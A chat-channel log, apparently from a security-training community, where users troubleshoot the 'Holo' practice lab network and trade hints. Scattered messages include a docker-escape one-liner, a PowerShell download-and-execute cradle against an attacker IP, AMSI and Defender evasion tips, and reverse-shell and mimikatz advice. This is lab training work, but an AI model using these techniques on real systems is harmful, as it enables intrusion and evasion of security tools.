#holo-network

1 messages · Page 3 of 1

wind bobcat
#

dropping all the way back down to 10.200.69.0/24 seems highly unusual

rare wyvern
#

Interesting...

upper rock
#

Holo released??blobknife

wind bobcat
#

my suggestion is this:

  • Leave the network
  • Rejoin
  • Regen VPN pack
rare wyvern
#

Ok

#

After rejoining...

wind bobcat
#

can you access .33 via web?

#

there should be a wordpress instance running

rare wyvern
wind bobcat
#

worth noting it would be on http and not https

#

I wonder if that subnet is just dead :/

#

@chrome cave know any way to force a user onto a new network subnet?

rare wyvern
chrome cave
wind bobcat
#

reeeeee

chrome cave
#

Skidy can shift people manually though

wind bobcat
#

@bright stirrup build network tools reee

#

@frigid nacelle do you happen to have access to the 10.200.69.0/24 network still? if so could you check and see if it's possible to access .33?

upper rock
#

I just opened a random task (Thanks, I’ll let myself in.) and found a very small typo in the JavaScript, it says in the code block “document.getElementbyID” the D should be lowercase and the b should be uppercase, otherwise it wouldn’t work in JavaScript

#

In the screenshot below it’s correct but in the code block it a small typo

chrome cave
wind bobcat
#

@lone spruce ^^ that one is your dept

#

harass horsie on Snapchat ezpz

bright stirrup
#

Lmao

#

Im not assigned to that task currently

#

Sorry homies

wind bobcat
#

TAKE INITIATIVE HORSIE

chrome cave
rare wyvern
#

Interesting here.

chrome cave
#

@wind bobcat should I give Cry manage messages in here?

#

Or nahhhhhh 😆

wind bobcat
#

nah

bright stirrup
#

@chrome cave mhhh there are only two people that can tell me that

#

Otherwise u can be pretty sure I wont do it just for the sake of being an ass

chrome cave
bright stirrup
#

And I'm busy racing other bicycles in Paris

bright stirrup
#

Anyway, im out, gl hf, love you all

harsh pier
#

Wait

#

This channel is no longer a meme

bright stirrup
#

Dw it still is

chrome cave
#

Get back here you lazy shark-headed, equine sod! 🤣

bright stirrup
#

Lmao

#

Ok

#

Lets play a game

chrome cave
#

Network console!

bright stirrup
#

If you give me the name of the monument i posted

#

Ill think about doing something about it

#

You have until 05'

#

It's easy.

harsh pier
#

I found it

chrome cave
#

Thanks Fawaz. I hate Geolocation

harsh pier
#

You've been found french boy

#

Give us the money

frigid nacelle
bright stirrup
#

Fawaz wasnt a player in this tho

harsh pier
wind bobcat
# frigid nacelle .33 is down.

thanks for confirming. I wonder if when Ashu had us clone the boxes last, they may have removed the instances attached to the test network

hollow steepleBOT
#

Gave +1 Rep to @frigid nacelle

wind bobcat
#

I guess we wait for Skidy or Ashu

west sail
bright stirrup
#

@west sail fix thm bot

#

Kek

west sail
#

which part?

bright stirrup
#

All parts

#

Jkjk

#

Just messing

west sail
#

I did actually write some bot code I need to test/push/PR

bright stirrup
#

I am.. as one would say.. horsin around

west sail
#

got sidetracked and forgot

bright stirrup
#

Aye dope

west sail
#

but yeah, in all seriousness, I'd be willing to help with code stuffs

bright stirrup
#

Cool cool! I have a few projects for the bot, I might contact you about it when it'll be in motion

west sail
#

cool. Yeah, I saw you'd posted something about a total rewrite, so i sorta stopped what I was working on and then forgot cuz I'm a knucklehead

rare wyvern
#

So I could possibly do the network soon or what does that look like?

wind bobcat
#

we need to wait for a thm admin to be available to assist

rare wyvern
#

Okay.

quiet ingot
#

Yay holo is up!

foggy crest
#

Is it?

#

Maybe? It asks for sub

wind bobcat
foggy crest
#

Ok cool

lone spruce
#

Holy shit

#

I go to work for the night and I come back to everyone realizing Holo is a thing

west sail
#

Christmas in July! 🥳 kekwsanta

river cradle
lone spruce
#

I’m going to bed don’t break anything too badly

river cradle
old plaza
boreal pond
#

Holo is now cancel.

#

Thanks for playing.

river cradle
foggy crest
river cradle
#

because why not

foggy crest
rare wyvern
#

👀

upper rock
#

If you find typos in holo where is the place to report them? :)

urban halo
#

I got a DM from a remember I don't know, with a pretty suspicious link. Who and where do I report him to?

outer mountain
#

@chrome cave I think you dealt with something like this just now

chrome cave
#

Gimme name

urban halo
#

sven1988#1781

chrome cave
#

@zenith delta

#

Done

urban halo
#

It's stupid that they think it's actually going to work especially in a community like this

#

Anyway, thank you my people. Have a good day

radiant spindle
#

network is down

#

can't even ping the machines after the boot and there are not enough votes to reset it

clear zephyr
#

if you guys are having issues, would you mind leaving the room and re-joining it? 🙂

radiant spindle
#

it works, thanks 🙂

next kite
#

Do the networks give points?

#

Looking forward to starting this! 🙂

frigid nacelle
frigid nacelle
next kite
#

Okay cool 🙂

#

Thanks

upper rock
#

I found one small typo in task 5, the "are are"

radiant spindle
#

In task 8, are we looking for subdomains in vhost scanning or FQDN's ?

#

What are the two other domains present on the web server? Format: Alphabetical Order

stable dune
radiant spindle
#

i got ton of subdomains, added primary domain in hosts file and then scanning on that

stable dune
radiant spindle
#

is it ok If i dm you ? @stable dune

radiant spindle
#

thanks 🙂

radiant spindle
#

how old is holo network, i can't ping any machine even after reset

#

tried leaving room and joining back

glacial temple
radiant spindle
#

L-SRV01

#

i see you have throwback tag on you, is that network stable if i buy that ?

glacial temple
#

Throwback is a complete different network and yea it was pretty stable when I did it

radiant spindle
#

is holo new btw ?

glacial temple
#

Yep

#

But it’s only soft-released as it still hasn’t been fully tested as few other testers haven’t completed it

radiant spindle
#

that's why maybe

#

got it

#

even when i am trying to find vhost, webserver goes in filtered stage and drop every web request

glacial temple
#

You may have multiple vpns running

#

Type ip addr and see if you have more tun addresses than you should

radiant spindle
#

neah just one, tried even attackbox

#

in my local just had one tun0

glacial temple
#

Hmm not sure then I would check to see if I could ping it but i’m out atm

#

But it should ping

radiant spindle
#

now i can ping, it's really unstable

lone spruce
#

cc: @clear zephyr

#

cc: @outer junco

outer junco
weak rapids
#

typo error : its GRUNT , T is outside of the italics.

#

task 25

radiant spindle
outer junco
#

Have you regenerated your OpenVPN config file?

#

Are you on a new network (does the network map show an IP with a different third octet?)

radiant spindle
#

now i'm connecting through attackbox

#

and again it failed

outer junco
#

are you connected on both the VPN on your machine, and the AttackBox?

#

You can't have both running at the same time.

radiant spindle
#

nope

cinder notch
#

I'm actually on that instance right now and everything seems to be fine

outer junco
# radiant spindle nope

If you left and joined the room, you'll need to terminate the AttackBox and then restart it:)

radiant spindle
#

got it :), will try that

cinder notch
#

This isn't a big issue, but in task 8, there's a sentence that says "We can utilize Gobuster again to identify potential vhosts present on a web server." But, gobuster and wfuzz aren't introduced until task 9. I just thought I missed something from the previous task based on the verbiage.

lone spruce
#

oh, that was just me reordering tasks and breaking them up

#

didnt realize that was in there still

#

@wind bobcat you cant hide from me by just changing your name. fix it fix it fix it

lone spruce
cinder notch
#

Is there supposed to be an alpine image on the webserver or do I have to upload it myself? I can't seem to get the SUID privesc to work. (Task 19)

wind bobcat
#

wait a sec

#

they changed it

#

smh

glacial temple
#

Rip

wind bobcat
#

if you run a docker images you should see all the images installed on L-SRV01

#

you can replace alpine with one of those

#

this should work:
||docker run -v /:/mnt --rm -it ubuntu:18.04 chroot /mnt sh||

cinder notch
wind bobcat
tepid halo
#

So they recommend a Windows VM for developing .NET. But this expires soon. Is the recommended way actually getting a license for a developing Windows VM?

#

If that is the case, I think I will just install Visual Studio in my Windows host ...

wind bobcat
#

personally, I use VS Studio on my host

#

but you can extend the trial w/ slmgr /rearm

tepid halo
#

👍

wind bobcat
#

I don't think I'd personally ever buy a license for deving stuff unless my employer is paying for it

#

but you can find keys that aren't volume license that are cheap that are completely fine

strange rock
#

so soft release? 👀

wind bobcat
#

yessir

strange rock
#

aah ill finish soon sadcooctus

frigid nacelle
west sail
young cove
#

Having trouble using gobuster to look for vhosts. Every time I run it I get a timeout error. I have event waited for a network reset. Can anyone help? My hosts file points to holo.live with my 10.200.x.33 IP

radiant stone
#

OMG HOLO IS RELEASED

wind bobcat
glacial temple
weak rapids
#

is ping disabled in the machines?
cause nor the .30 or the .33 responding to pings

#

tried rejoining the room

#

and regenerated a new vpn file

weak rapids
#

just remembered its a Windows environment darkchamp

#

but nmap still wont work with the -Pn

river cradle
#

iirc 30 won't respond to pings since it is in the "internal" side of the network, not sure about 33, should work fine i think

young cove
hollow steepleBOT
#

Gave +1 Rep to @wind bobcat

radiant spindle
#

In task 9 what is fuzz: what exactly is the question (What file loads images for the development domain?)

I on dev domain, am i looking for a image file or a php file which contains it ?

#

this is only subtask i'm left with in task9, can't get the question

#

ok

#

got it, thanks 🙂

young cove
#

I think I am missing a flag. Under Task 14 the last question is Submit the flag on L-SRV02, but as far as I have seen nothing in that task has lead to a flag. Am I missing a step? I have looked in the .dockerenv file and under /proc/1.

lone spruce
#

Have you looked for a user flag

young cove
#

I have not. I will give that a try.

young cove
hollow steepleBOT
#

Gave +1 Rep to @lone spruce

wind bobcat
cedar maple
#

I knew someone would mention holo here kekw

wind bobcat
haughty jacinth
#

hey , I need help in Task18 , I followed the exact same steps but unable to get reverse shell

wind bobcat
haughty jacinth
#

yes

wind bobcat
#

I would try downloading a Meterpreter reverse shell into /tmp/ and trying to execute it

#

you may have better luck with that

haughty jacinth
#

thanks , I got the reverse shell 🙂

lone spruce
#

yeah that is a bit of an advanced way to get a shell

#

def easier work arounds but its a cool thing to show off

haughty jacinth
#

yes

echo whale
#

Is the network down? I could fuzz subdomains but now while trying to do directories gobuster keeps giving me a “unable to connect to…… “ “ client timeout exceeded while waiting headers

#

Have checked access and I’m connected to holo through VPN

#

(Otherwise I wouldn’t have gotten the subdomains lol)

#

Have tried increasing the timeout, still unable to connect ☹️

livid shoal
#

so it finally released? publically

river cradle
#

does this count as a fanart submission?

weak rapids
#

etc/apache2/ports.conf

#

this file right?

wind bobcat
#

php -S 127.0.0.1:yourport
is a much better alternative imo

#

it should do the same

hollow steepleBOT
#

Gave +1 Rep to @wind bobcat

gloomy ravine
#

i took 6 month subsccription in december because of holo. But it got released now and i dont have subscription 😫

river cradle
#

holo is cancelled

weak rapids
#

how am i supposed to know via this method?
i got the param via the source code, but want to try out the same method using wfuzz

wind bobcat
#

so FUZZ=ls+-la should have a longer word/char/line length

#

because it's the whole html webpage plus the contents of ls -la

mint geode
#

HOLOHOLOHOLO

#

ITSRELEASEDDDDD

#

can we do holo on attackbox

#

or is it too hard

river cradle
#

i think you could but it might be a hassle deeper into the network if you're not working on your own machine

mint geode
#

Ok, thanks. It's just because i dont have my own pc

#

to run a vm on

#

so i use attackbox 🙂

lone spruce
#

I mean you can

#

youll just have to set some other things up deeper into the network

mint geode
#

btw, whats with all the vargs

wind bobcat
#

I don't know and at this point I'm too afraid to ask

mint geode
#

lol

livid shoal
#

guys one question. if i am in the room now but in few days my subscription will end

#

so with sub the room does too?

wind bobcat
#

we don't know yet

river cradle
weak rapids
#

thanks )

foggy crest
livid shoal
#

ik tho i was just confirming for holo

boreal pond
drifting garnet
#

Can someone confirm if Task 12 (RCE on site) is working?

livid shoal
#

well guys

#

i added holo.live to the hosts file but

#

browsing it shows page not found

#

but it pings

#

its weird idk whats happening

#

can anyone help?

weak rapids
#

i think its iintended

#

the other subomains work for m

weak rapids
#

i mean if i ctrl+c

#

then it taks years to load

#

new tab

livid shoal
#

:/

weak rapids
#

this takes uyearsssssssssss

livid shoal
#

neither admin

weak rapids
#

the port scanning script

livid shoal
#

@weak rapids is it working for u

#

?

cinder notch
weak rapids
#

yea

#

yes

#

rigt

hollow steepleBOT
#

Gave +1 Rep to @cinder notch

cinder notch
#

Np

weak rapids
#

for me admin page takes years to load

cinder notch
#

I don't know why it does that sometimes but fully closing and reopening seemed to work. I don't remember if a hard refresh worked though.

livid shoal
#

lol

#

reconnect to

#

the vpn maybe

weak rapids
#

tried all that

hollow steepleBOT
#

Gave +1 Rep to @cinder notch

drifting garnet
#

Is it supposed to display a page when logging in, because I don't get that 🤔

weak rapids
#

how am i suposed to find the IP address of tyhe machine withut looking at the graph?

#

docker

drifting garnet
weak rapids
#

the subnet wont resong to ping scans rigt

drifting garnet
#

I am guessing you are doing it through a proxy, in which case; make sure you are doing a handshake

weak rapids
#

figureed it out lol

#

i had to use the ip of the machine insteda of loca host

drifting garnet
#

It must be broken or something 🤔

radiant spindle
#

any hints on task12 rce, i tried it on img? to fuzz but not sure if that's right. Stuck on it from 2 days

#

i tried intercepting the request in burp as well tried whoami but that didn't work

weak rapids
#

waaaaa

#

network just restarted, can anyone access the admin subdomain? am not able to

#

been 15 min since boot

weak rapids
#

am only able to view the .33/robots.txt

#

the domains dont work

foggy crest
#

same am also not able to access

wind bobcat
#

and as for not being able to access it, I honestly can't provide any other advice other than reboot?

lone spruce
#

Or just change the file name?

#

it says the error right there

random elm
#

hello. the admin site login doesnt seem to work. responds with valid then redirects to the dashboard, but doesnt set a cookie or anything

#

any request to the dashboard just redirects back to login

#

this would be task 12 - i guessed the answers but cant confirm them alas (ideally I shouldn't have just guessed them)

#

also should note that the command to unzip the test site is not quite correct - doesnt put the unzipped files in the right place. trivial to fix thouggh

weak rapids
weak rapids
hollow steepleBOT
#

Gave +1 Rep to @lone spruce

river cradle
weak rapids
hollow steepleBOT
#

Gave +1 Rep to @river cradle

livid shoal
#

well, yesterday i connected to vpn but

#

the request was not completing

#

i mean it was not reaching the website or even the ip

#

but it worked some hours before

haughty jacinth
#

anyone who can help me with this part

wind bobcat
haughty jacinth
#

it worked , previously I tried with only "ubuntu" forgot to mention the version / TAG

zenith delta
woven lava
#

Hey everyone, a quick question: for those of with shitty PCs, what's the recommeded way to compile C# for the tasks?

livid shoal
#

it could work

#

ig

woven lava
#

I have a shitty 4GB i3 wit some 1TB HDD 🤡

woven lava
hollow steepleBOT
#

Gave +1 Rep to @livid shoal

vale nimbus
#

Hey, did anyone managed to get root on S-SRV02? I've got root on the DC, but when I tried to connect to S-SRV02, all I ever get is STATUS_TRUSTED_RELATIONSHIP_FAILURE

livid shoal
#

woah u completed it

#

almost

woven lava
#

Hey, is the port 80 of L-SRV01 open? All my Nmap scans show it's closed

wind bobcat
wind bobcat
vale nimbus
#

Thanks! I am on the 10.200.69.0/24 one, if that's what you mean

wind bobcat
#

mother-
@frigid nacelle would you be willing to toss me over your VPN pack by chance?

river cradle
wind bobcat
#

@river cradle yes plz bb

wind bobcat
#

ah oka

#

i'll need to fix this box in dev

#

the reason it's dying is because of lack of memory

#

attempted to RDP in 2x and it died both times

#

1 time it straight up couldn't handle the logon process

#

2 time it was able to handle it and couldn't start powershell

#

after attempting to start powershell, it ided

next kite
#

how do i get started with holo? im connected to the VPN but no traffic leaves my thorugh the vpn interface tun0 - i checked with tcpdump. not sure whats going on...

#

i tried scanning the 10.200 range and the 192.168.100.0 range

#

ok regenrated my vpn and it seems to be working onw

frail mason
#

Hello! I'm a bit confused about how to perform Task 17. This what I'm being told meanwhile. Could someone clarify?

lone spruce
#

You’re running it on the correct machine right?

#

@wind bobcat

frail mason
lone spruce
# frail mason yes. on 192.168.100.1

I didn’t set that one up or look over the instructions for a while but I believe there are two different SQL servers on it? Make sure you’re accessing the right one

frail mason
hollow steepleBOT
#

Gave +1 Rep to @lone spruce

next kite
#

Is there any chance for a reset on the network please the initial web server has crashed. 10.200.106

livid shoal
#

worked for me

#

also

#

a doubt for amsi bypass

#

we need to spin a windows vm?

#

locally

lone spruce
#

it’s recommended you do

#

you don’t need to

livid shoal
#

ah okok

next kite
#

The network only seems to allow for 10 gobuster threads. Is this because other people are on the machines too?

#

Or is there a network issue!

wind bobcat
#

likely too many people per subnet

#

honestly, I bet that's what's taking the web server down

next kite
#

I did run ferox buster against it and that’s when it crashed. It’s ok now as the network went to sleep.

#

I’m running gobuster with 5 threads right now. It’s slow on the main VHOST but on the others it runs with fairly decent speed on 5 threads

#

Running all consecutively (although I wasn’t to begin with)

wind bobcat
#

I've just added a note on the WFuzz/GoBuster tasks requesting users to decrease the thread count

next kite
#

Okayyy amazing. Thankyou

#

It kept erroring out

wind bobcat
#

I thought so. Worst case, I'll have Skidy bump the resources

next kite
#

As a tip could you include adding | tee gobuster-vhostname.out to their command? It clears all the error messages and gives you nice output

#

May be handy and prevent you getting called upon often

cedar prism
#

@wind bobcat can you check host 10.200.69.33, none of the web resources are running on it

river cradle
#

if the webserver is dying from everyone hammering it with request i can't imagine what things pc-filesrv01 will have to go through when everyone starts doing their part on it kek

woven lava
#

Yeah please reset the network of something. I guess we need two more votes. Can't even get started on the network.

river cradle
woven lava
#

Oh sorry. I'm on the 10.200.114.33 one and the port 80 is closed

#

;___;

bitter adder
#

Task6 complier with the windows virtual machine

#

Is that gonna be a blocker if i don't setup a vm for windows?

#

Or I can just skip it to continue the rest

wind bobcat
#

you know, I think I might know another reason as to why the web server might crash - a user could also be stopping it

#

which is no bueno

#

I'll make sure to add that in the tasks

#

since it's running in a docker container, it's easy enough to kill..

lone spruce
hollow steepleBOT
#

Gave +1 Rep to @lone spruce

livid shoal
sudden light
#

Hello . I just started the Holo lab and when I use nmap command the result is 0 hosts up , but the network state is running 🤔

woven lava
#

What's your subnet?

#

You might request a reset

#

Which reminds me, people in 114 subnet?

livid shoal
woven lava
#

I can't even get started tbh

livid shoal
livid shoal
woven lava
#

I need to more

woven lava
#

Like there are supposed to be 3 open ports

#

And I'm getting only 2

#

Port 80 is closed

#

😦

livid shoal
#

115 is stable

woven lava
#

Yeah a lotta people who are starting the network now are facing the same issue

livid shoal
#

btw

woven lava
#

2 more

livid shoal
livid shoal
woven lava
livid shoal
woven lava
#

Exactly

#

I thing someone terminated the web server or something

livid shoal
woven lava
#

Yeah 😦

livid shoal
# woven lava Yeah 😦

tho in meantime u can have a windows vm ready. you'll require it ahead if you already dont have one

woven lava
livid shoal
#

but but

#

you need windows 10 ig

woven lava
#

Windows 10? My PC will die

livid shoal
woven lava
#

I have a Windows10 VM on a Ventoy-USB if that helps

woven lava
livid shoal
woven lava
#

How do I avail that?

livid shoal
#

two small 1gb ram vms ( one windows and one linux ) always free till u a student

livid shoal
#

no credit card required :)

woven lava
#

NOICE

#

Gotta apply for that

livid shoal
#

yea its awesome

woven lava
#

Thanks man

livid shoal
#

welcome :)

median nest
#

hey support, it is not cool if the service crashes and you have to wait for 17 more votes before a reset.... at least make sure the service restarts itself...

river cradle
#

yeah i get it, i don't think it was supposed to end up with this many people on one subnet
while i'm not support i can try to apply a temp fix on 10.200.69.X while reset votes are still gathering

#

:80 and internal http should be up, still need a bit to get the other mysql running

livid shoal
median nest
hollow steepleBOT
#

Gave +1 Rep to @river cradle

median nest
livid shoal
#

mine got 3

river cradle
#

for some weird reason a bunch of people were dropped into the testing subnet

livid shoal
#

oops

river cradle
#

but yeah the foothold should be working fine now on .200.69.X, if it breaks again i can probably try to fix it again if spooky/cry aren't available

livid shoal
#

👀 anyone knows why its happening.
the machine is windows server 2016 datacenter
and rtp is enabled i checked it

river cradle
#

tried turning the vm off and on? 😄

livid shoal
#

ok now it

#

works

#

weird

#

thanks anyways

river cradle
#

machines do be weird sometimes

#

you sometimes just need to give them a (virtual) kick to get them running

livid shoal
#

😮

livid shoal
#

guys can anyone help me. i am really struggling with this part. the amsi bypass is kinda new and advanced for me :( no matter what i do it always gets detected :(

river cradle
lone spruce
livid shoal
#

lemme go see it again

livid shoal
#

done thanks

faint iris
#

Can anybdy try to run masscan on their respective Holo 10.200.x.0 subnet and show me what they get ?

#

The Linux serv is fine and works for me, but for some strange reason masscan finds jack shite

wind bobcat
#

and the .x. is something you should be providing, it's important we know which network you're in for solving any potential issues

faint iris
#

There is, ofc, a non-zero chance that's this is just me being an idiot.

#

I'm not too familiar with the tool

wind bobcat
#

that many packets per second is incredibly high

#

there's only 6 hosts in the whole subnet, that's the rate you'd use if you were trying to scan the whole internet lol

#

by default masscan runs at 1,000pps, you've upped it all the way to 100,000pps

faint iris
#

A very fair point ; lowering the rate doesn't seem to change anything so far

wind bobcat
#

it wouldn't surprise me if the web server crashed or just completely missed it all together

#

if you can access 80 on .33, then it's still alive, but if not, the server probably crashed

faint iris
#

It's still alive, I keep an eye on it after each scan

#

(I also thought I'd crashed it, doesn't seem so thankfully)

wind bobcat
#

does nmap produce the same results?

faint iris
#

Nmap works fine.

#

which is why I find this weird

wind bobcat
#

I wonder if masscans timeout is lower than nmaps is

#

you could try the --wait 30 flag

faint iris
#

nope, nothing

#

Beh, I'll just give up. Shame.

wind bobcat
radiant spindle
#

I'm stuck on task 17 Docker Breakout, i can access the DB but when i use one liner to create the php file from sql i can create it in www/html/ but when i try to access it with curl 127.0.0.1:8080/shell.php it just fails and if i use the ip address of linux machine then i get same www-data user in output.

#

if i try to do it again, there is file though. Tried changing file names but behaviour is same.

wind bobcat
#

you'll get the same user because you're running in the context of the same user -- www-data

#

you're not doing anything wrong

#

commands are being executed on the internal web server as www-data

radiant spindle
#

i logged in as admin under mysql

#

but then how i'm supposed to to priv esc as root

wind bobcat
#

once you receive a reverse shell on 192.168.100.1 (10.200.x.33) you'll need to preform basic enumeration to elevate privileges.

radiant spindle
#

i found active ports, i'm just going by tasks. So right now main point is task 17 what i can do here ?

wind bobcat
#

yes -- task 17 going into 18.

#

and privilege escalation on L-SRV01 (not the docker container) is outlined in task 19

radiant spindle
#

but on task 18 i'm supposed to have a rce on the host which i don't have

#

can you help me just a bit, if you can join vc ?

wind bobcat
#

you do have RCE on the host

#

you're just slightly confused because the commands are being executed as the same user

#

if you run a different command, for example, hostname

#

you'll see vastly different results

radiant spindle
#

6c57bcbfa147 it looks like a container id

#

if i do hostname

wind bobcat
#

you should see different results

radiant spindle
#

yup

wind bobcat
#

exactly -- so you're executing commands on a different host, not the container

radiant spindle
#

got it

wind bobcat
#

your next step is to get a reverse shell (outlined in task 18) and after you do that, you can proceed on to elevating privileges on task 19

radiant spindle
#

thanks 🙂

livid shoal
#

any other way to build defendercheck?

#

without visual studio

wind bobcat
#

yes

livid shoal
wind bobcat
#

try that exe in there

livid shoal
#

thanks alot

livid shoal
#

getting this error

wind bobcat
#

iirc you might need to specify an executable after it

livid shoal
#

oh

wind bobcat
#

the arguments for Defender Check are weird

#

they totally could have done a help page for it ;p

livid shoal
wind bobcat
#

did that end up working? theatcheck is miles better

livid shoal
wind bobcat
#

pog

#

theatcheck is better, anyways

#

not because Rasta Mouse built it or anything and we simp for Rasta

livid shoal
#

lol

#

@wind bobcat also a question. do i need to use the c2 or i can do it without c2 as well?

#

for this

#

one particularly

wind bobcat
#

you can do this without a c2

#

a side goal of our networks is to teach a C2 framework

#

or at least get you to try to use one, lol

#

everything that can be done with a c2 here can be done without

#

in the future, I'd like to build a network that focuses on Cobalt Strike

livid shoal
#

wow

#

👀

#

excited

wind bobcat
#

I'll need to ping some people in my space to see if we can pull this off

livid shoal
livid shoal
wind bobcat
#

yessir

#

Trials it might completely depend

#

as long as someone at Help Systems hopefully agrees to work with us, it might not cost anything

livid shoal
#

oh great then

#

@wind bobcat one last doubt ( hopefully 😅 ) in the room it says .exe. do de we have to convert powershell file to executable one?

wind bobcat
#

summon @lone spruce

strong raptor
#

Getting a Trust Relationship error when trying to RDP to S-SRV02. I am using domain admin credentials. I think a reset is needed?

wind bobcat
#

if your name happens to start with M and ends with 0, check your THM PMs

woven lava
#

So I just started with the holo network

#

And in task 8 the Syntax for wfuzz is given as :
wfuzz -u <URL> -w <wordlist> "Host: FUZZ.example.com" --hc <status codes to hide>

#

Won't it be:
wfuzz -u <URL> -w <wordlist> -H "Host: FUZZ.example.com" --hc <status codes to hide>

wind bobcat
#

yes, I'm going to kill Cryillic

#

syntax has been updated, thank you for reporting

livid shoal
#

it should be task 6 shouldnt it be?

lone spruce
livid shoal
#

i have a undetectable ps1 file

#

only

#

not exe

#

yet

woven lava
#

Umm any mods there? I might have something to report.

cedar prism
#

spooky is around

woven lava
#

Offline

#

I'll check general

radiant spindle
#

why the timespan is just 10 days for holo

glacial temple
#

You can join back it's because a lot of people will be joining and so it will free up space on the networks

radiant spindle
#

will our progress remain in network ?

glacial temple
#

Yep

radiant spindle
#

perfect 🙂

bronze kettle
#

Anyone could help me
I am trying to execute my revshell binary (in local network) but get this error, what stands for?
Listener?

I am trying to execute it with default sourcecode (Executor and Stager) and without defender, anyway this error

livid shoal
bronze kettle
#

No, Binary

livid shoal
#

oh sheesh

#

my bad 😅 i was looking for it

livid shoal
#

ok i am way too much confused on how to use covenant

#

@wind bobcat can i ask some things if u are free?

wind bobcat
#

Unfortunately, Cryillic is in charge of those sections. I'm 7-20 | 44-47

livid shoal
#

oh okok

river cradle
#

depending on the question i might have the answer @livid shoal

wind bobcat
#

szy is resident c2 expert

river cradle
wind bobcat
#

maybe for cobalt strike

river cradle
#

i only touched the unnamed once, and empire also once during throwback

#

anywhere else i just used covenant kek

#

broke on me multiple times

#

@wind bobcat which one are you going to use with very advanced attacker labs? kek

wind bobcat
#

none

#

RDP Ception baybeeeeeee

river cradle
#

yikes

wind bobcat
#

ill be honest, deep network segmentation is unrealistic except in ICS/SCADA networks

livid shoal
wind bobcat
#

but often at times, they'll just be completely airgapped

river cradle
# livid shoal 👀 so i generated the ps1 amsi bypass payload which is not detected by antivirus...

you can do it like that with the php file giving you a revshell and spawning a covenant grunt from that, or you can try execute the grunt stager directly from that php file (obviously with the amsi bypass embedded)
both of those might result in pretty big files because of how obfuscation works.

what i like to do in labs like this is host the powershell payloads/stagers separately and in the "exploit" just place a snippet that triggers it's load
usually it looks like this: I slap the amsi bypassing portion in the first part of the file and right below it just copy the powershell stager, optionally obfuscate that, host that on a webserver (you can use the one embedded in covenant) and invoke it from the exploit/whatever using IEX(New-Object Net.WebClient).DownloadString('http://yourip/file.ps1')

livid shoal
river cradle
#

you can take multiple approaches, you can also make a binary, download it and run from the php file
there's no single correct way to do this

livid shoal
river cradle
#

from what i understand if you don't place it on the disk then it will only go through amsi

livid shoal
#

ok thanks lemme try

river cradle
#

lmk how it goes

wind bobcat
#

so we figured out what is up with .69

#

there happened to be 145 users in that one network

frigid nacelle
#

😄

#

It's a party.

river cradle
wind bobcat
#

autoscaling go brrr

river cradle
#

you know what time it is?

#

autoscaling broken hors pls fix

wind bobcat
#

@bright stirrup holo broke plz fix

gloomy ravine
#

yeah its broken

river cradle
#

and what subnet

gloomy ravine
river cradle
#

there is no dc webserver

#

the only webservers are s-srv01, l-srv01 (technically l-srv02)

gloomy ravine
#

sorry its accessible

dry iron
#

Task 30 -- Dead link

livid shoal
#

yea ^

livid shoal
# river cradle lmk how it goes

ill try it today. i slept last night. one more thing do i need to proxychains the c2? I mean how would it reach to me? or just running chisel on client and server side makes the job done?

wind bobcat
#

there's only network filtering inbound, not out

#

so as long as an internal machine initiates the conversation, it should be fine

livid shoal
#

ah alright thanks

wind bobcat
#

-undelete 1

hollow steepleBOT
#

Up to 10 last deleted messages (last hour or 12 hours for premium):

none...

livid shoal
# river cradle lmk how it goes

nopes no success with this one. https://gist.github.com/mananchawla2005/737db1d2f0b0783ac7ad99a534771fff thats my php script which downloads the file names gg.ps1 from http server setup on my machine ( the file is being downloaded it is shown in the logs) . So as we discussed i added the stager code generated by c2 after amsi bypass code like this -> https://gist.github.com/mananchawla2005/b82be3800460adf750cee5c134f17e83 but the file was requested but no grunt was being created. Then i tried replacing the stager code with normal reverse shell payload https://gist.github.com/mananchawla2005/d395b66cc65fe21db8814838f25d3725 but still no shell?
Am i doing something wrong? also i added the proxy in my browser to access the webpage so i can access either the website or the c2 not both at same time. any workaround for this?

bright stirrup
radiant spindle
#

In task 22, dugging a tunnel - we don't have access to windows server if we have to download chisel there and sshutlle, we already have 2 linux machines down. I'm already on L-SRV01. I think I'm supposed to get control of DC-SRV01 but what's the point of chisel then

#

I'm confused in it

livid shoal
#

its in the network

radiant spindle
#

can we rdp that server

livid shoal
radiant spindle
#

can't even ping windows network

livid shoal
#

any responses?

radiant spindle
#

I'm on linux machine

livid shoal
#

port 80 is open for that

radiant spindle
#

and now for chisel i'm supposed to have access on DC-SRV01

#

or we are accessing some service of DC-SRV01 on L-SRV01 ?

livid shoal
#

its just in network

nocturne pulsar
#

anyone else notice that a scheduled task is missing on PC-FILESRV01? or is it just me

vestal furnace
#

anyone facing any problem with dirsearch while fuzzing, Im using default 30 threads still the fuzzing freezes after a while

radiant spindle
#

I can't find any internal port open in l-srv01

white berry
vestal furnace
vestal furnace
#

Kinda I mean when I tried dirsearch it started off good but after a while the request count came down to like 5 and it froze

#

It happened every time i tried

white berry
#

Can you fuzz with gobuster or wfuzz?

#

@vestal furnace I believe you are using an old version of dirsearch

vestal furnace
#

Im using dirsearch v0.4.1

white berry
vestal furnace
#

Will update it rigt away

nocturne pulsar
#

Hi, can someone take a look at PC-FILESRV01 on subnet 10.200.111.0/24, I dont think its behaving properly based on the instructions.

nocturne pulsar
#

@livid shoal well, for one i cant access it with winrm as per the instructions, but no problem accessing via RDP, then the dll injection is not running because the scheduled task is missing, unless im just stupid, which is probably the case

livid shoal
#

😶‍🌫️

livid shoal
#

evilwinrm says

#

authorisation

#

denied

#

something like that with u too?

nocturne pulsar
#

@livid shoal yeah, the user doesnt have the permissions, but you can access it with RDP

nocturne pulsar
#

through proxychains

livid shoal
#

someone using

#

printmare

#

on rdp

#

seriously? 🤦

nocturne pulsar
#

ok

#

thats one way to do it?

livid shoal
#

not the intended way for the network

#

bruh

nocturne pulsar
#

because its mutli user, you probably just cut someone else off mid session

#

lol

nocturne pulsar
#

leave them a nice message and disconnect

nocturne pulsar
livid shoal
#

let me try

#

if my subnet

#

is good or not

nocturne pulsar
#

or, I just dont understand it properly

#

which is what im trying to figure out

livid shoal
#

i did the raw way

#

i mean simple reverse shell

nocturne pulsar
#

for PC-SRV01

#

?

#

i just made a php script that fetched a non detected nc.exe and created a revshell

#

the intended way is too complicated

livid shoal
#

i just used a simple rev shell payload

#

and put it at the end of

#

amsi bypass

#

and then just executed the powershell file

#

this is another way to do it

nocturne pulsar
#

then i did Add-MPPreference -ExclusionPath "path" so i could run mimikatz

livid shoal
#

lmao

livid shoal
#

it just directly executes from stdout

nocturne pulsar
#

nice

#

so straight into memory?

livid shoal
nocturne pulsar
#

nice, ill have to remember that one

livid shoal
#

szy told about this trick

#

😄

#

here he is
